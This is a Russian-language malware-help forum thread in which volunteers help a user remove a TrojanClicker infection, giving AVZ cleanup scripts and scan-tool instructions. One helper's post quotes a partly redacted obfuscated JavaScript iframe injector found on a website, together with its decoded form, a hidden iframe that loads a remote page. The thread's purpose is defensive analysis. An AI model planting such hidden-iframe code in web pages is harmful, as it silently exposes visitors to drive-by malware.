• Администрация SafeZone приветствует вас на нашем форуме!
    Если вы больше не желаете видеть рекламу при просмотре тем и сообщений - то достаточно просто зарегистрироваться. Для зарегистрированных пользователей реклама не отображается.

Решена TrojanClicker и его последствия

kirey

Активный пользователь
Сообщения
23
Симпатии
1
#1
Проблема такова: Нод32 начал при загрузке браузера Opera выбавать сообщения об угрозе с сайта (ссылка удалена) о TrojanClicker. Причем на этот сайт не заходил уже очень давно. Никаких последствий это не несло поначалу. Сканирование системы самим нодом и CureIt результатов не дало. Примерно через сутки Нод выдал информацию о заражении файла QIP.EXE в автозагрузке и еще одного файла. К сожаленью не запомнил какого. Переустановить qip не удалось. Очень бы хотелось узнать что с системой и как от этого избавится). Заранее спасибо.


Прошу прощения за тему созданную в другом разделе по ошибке.
 
Последнее редактирование модератором:

akok

Команда форума
Администратор
Сообщения
14,061
Симпатии
11,740
#2
Эту тему убрал. Тот раздел для файлов с карантином. :)
http://safezone.cc/forum/showthread.php?t=3031

Добавлено через 5 минут 50 секунд
С сайта грузится Trojan-Clicker.JS.Agent.h (ссылку удалил)
Там iframe:

HTML:
<iframe src="*******" width=103 height=125 style="visibility: hidden"></iframe><script>function v4a83f49dcd229(v4a83f49dcd9f7){  return(parseInt(v4a83f4*******68(v4a83*********0a6 () {var v4a83f49dd1877=2; return v4a83f49dd1877;} var v4a83f49dd0107='';for(v4a83f49dd08d6=0; v4a83f49dd08d6<v4a83f49dcf937.length; v4a83f49dd0*******d0107+=(String.fromCharCode(v4a838********7.substr(v4a83f49dd08d6, v4a83f49dd10a6()))));}return v4a83f49dd0107;} document.write(v4a83f49dcf168('3C69667*********4703A2F2F747261636B696E676C6F61642E636F6D2F652F696E646578372********23333206865696768743D323131207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>
Который означает
HTML:
<iframe name='9190' src='http://*******.com/e/index7.php' width=233 height=211 style='display:none'></iframe>
Добавлено через 13 минут 46 секунд
AVZ, меню "Файл - Выполнить скрипт" -- Скопировать ниже написанный скрипт-- Нажать кнопку "Запустить".
Код:
begin
 SearchRootkit(true, true);
 SetAVZGuardStatus(true);
 SetServiceStart('RemoveAny', 4);
 QuarantineFile('C:\WINDOWS\system32\Drivers\removeany.sys','');
 DeleteFile('C:\WINDOWS\system32\Drivers\removeany.sys');
 DeleteService('RemoveAny');
 BC_ImportALL;
 ExecuteSysClean;
 BC_Activate;
 RebootWindows(true);
end.
После выполнения скрипта компьютер перезагрузится.

Код:
begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

Полученный архив прикрепите к этой теме согласно правил.

Пофиксить в HijackThis следующие строчки
Код:
 R3 - URLSearchHook: (no name) - - (no file)
Повторите логи.

Добавлено через 8 минут 51 секунду
Примерно через сутки Нод выдал информацию о заражении файла QIP.EXE
Таки правильно выдал.
http://habrahabr.ru/blogs/virus/66937/

Скачайте свежий дистрибутив QIP. И мой Вам совет ознакомтесь с этой темой.
 
Последнее редактирование модератором:

kirey

Активный пользователь
Сообщения
23
Симпатии
1
#3
Спасибо большое за быстрый совет. К сожаленью выыполнить все получится только вечером. На работе QIP такую же штуку выдал, но все удачно переустановилось.
И еще один вопрос. Обязательно ли карантинить CLTest.exe? Это прога для настройки (калибровки) монитора. А в автозагрузке чтобы при включении сразу применялись предустановленные настройки.
 

akok

Команда форума
Администратор
Сообщения
14,061
Симпатии
11,740
#4
kirey, нет, необязательно.

Поправил скрипт.
 

kirey

Активный пользователь
Сообщения
23
Симпатии
1
#5
Тему с карантином создал. Логи повторяю.
 

ТроПа

Активный пользователь
Сообщения
391
Симпатии
334
#6
На данный момент в логах активного заражения не видно.
Проблемы ещё какие-то наблюдаются?
 

kirey

Активный пользователь
Сообщения
23
Симпатии
1
#7
Проблема осталась. Нод периодически продолжает выводить сообщение о Trojan-Clicker.iframe GT
 
Последнее редактирование:

ТроПа

Активный пользователь
Сообщения
391
Симпатии
334
#8
Проблема на том же сайте наблюдается или и на других тоже?
 

akok

Команда форума
Администратор
Сообщения
14,061
Симпатии
11,740
#9
Скачайте Malwarebytes' Anti-Malware, установите, обновите базы, выберите "Perform Full Scan", нажмите "Scan", после сканирования - Ok - Show Results (показать результаты) - нажмите "Remove Selected" (удалить выделенные). Откройте лог и скопируйте в сообщение.

Скачайте DDS или с зеркала и сохраните на рабочий стол, отключите антивирус и запустите dds.scr, когда сканирование закончится, запакуйте файлы из файлов DDS.txt и Attach.txt и вложите в сообщение
 

kirey

Активный пользователь
Сообщения
23
Симпатии
1
#10
ТроПа
Проблема проявляется при входе в браузер. А сообщение нода о трояне именно с того же сайта.
 

akok

Команда форума
Администратор
Сообщения
14,061
Симпатии
11,740
#12
Очистите временные файлы через Пуск-Программы-Стандартные-Служебные-Очистка диска или с помощью ATF Cleaner
- скачайте ATF Cleaner или с зеркала, запустите, поставьте галочку напротив Select All и нажмите Empty Selected.
- если вы используете Firefox, нажмите Firefox - Select All - Empty Selected
- нажмите No, если вы хотите оставить ваши сохраненные пароли
- если вы используете Opera, нажмите Opera - Select All - Empty Selected
- нажмите No, если вы хотите оставить ваши сохраненные пароли
 

kirey

Активный пользователь
Сообщения
23
Симпатии
1
#13
Вот подозреваю, что в этом-то вся и проблема. Ни ATF ни Ccleaner ничего очистить не смогли. Папки с кешем в стандартном месте нет. Поиск по компу тоже ничего не дал. При этом в самой опере файлы кеша можно посмотреть. Саму оперу уже переустанавливал полностью.. Наверно нужно еще раз попытаться снести ее.
 

kirey

Активный пользователь
Сообщения
23
Симпатии
1
#17
Так тожет чистил. Не помогает. Завтра переустановю оперу с удалением всех закладок и настроек.
 

kirey

Активный пользователь
Сообщения
23
Симпатии
1
#18
Даже переустановка оперы ничего не дала. Почисил кеш и кукисы заодно в IE. Результат тот же самый... Всплывает окно нода с сообщением с угрозой с того сайта.
 

akok

Команда форума
Администратор
Сообщения
14,061
Симпатии
11,740
#19
Значит пойтем не стандартным путем.

Проверьте систему при помощи cureit

Скачайте ComboFix здесь, здесь или здесь и сохраните на рабочий стол.

1. Внимание! Обязательно закройте все браузеры, временно выключите антивирус, firewall и другое защитное программное обеспечение. Не запускайте других программ во время работы Combofix. Combofix может отключить интернет через некоторое время после запуска, не переподключайте интернет пока Combofix не завершит работу. Если интернет не появился после окончания работы Combofix, перезагрузите компьютер. Во время работы Combofix не нажимайте кнопки мыши, это может стать причиной зависания Combofix.
2. Запустите combofix.exe, когда процесс завершится, скопируйте текст из C:\ComboFix.txt и вставьте в следующее сообщение или запакуйте файл C:\ComboFix.txt и прикрепите к сообщению.
Прим: В случае, если ComboFix не запускается, переименуйте combofix.exe в combo-fix.exe

Подробнее в "ComboFix. Руководство по применению."

Скачайте Gmer или с зеркала. Запустите программу. После автоматической экспресс-проверки, отметьте галочкой все жесткие диски и нажмите на кнопку Scan. После окончания проверки сохраните его.
 

kirey

Активный пользователь
Сообщения
23
Симпатии
1
#20
Высылаю логи. Проявления трояна пока вроде не было. Буду надеятся, что изчез)) Спасибо вам)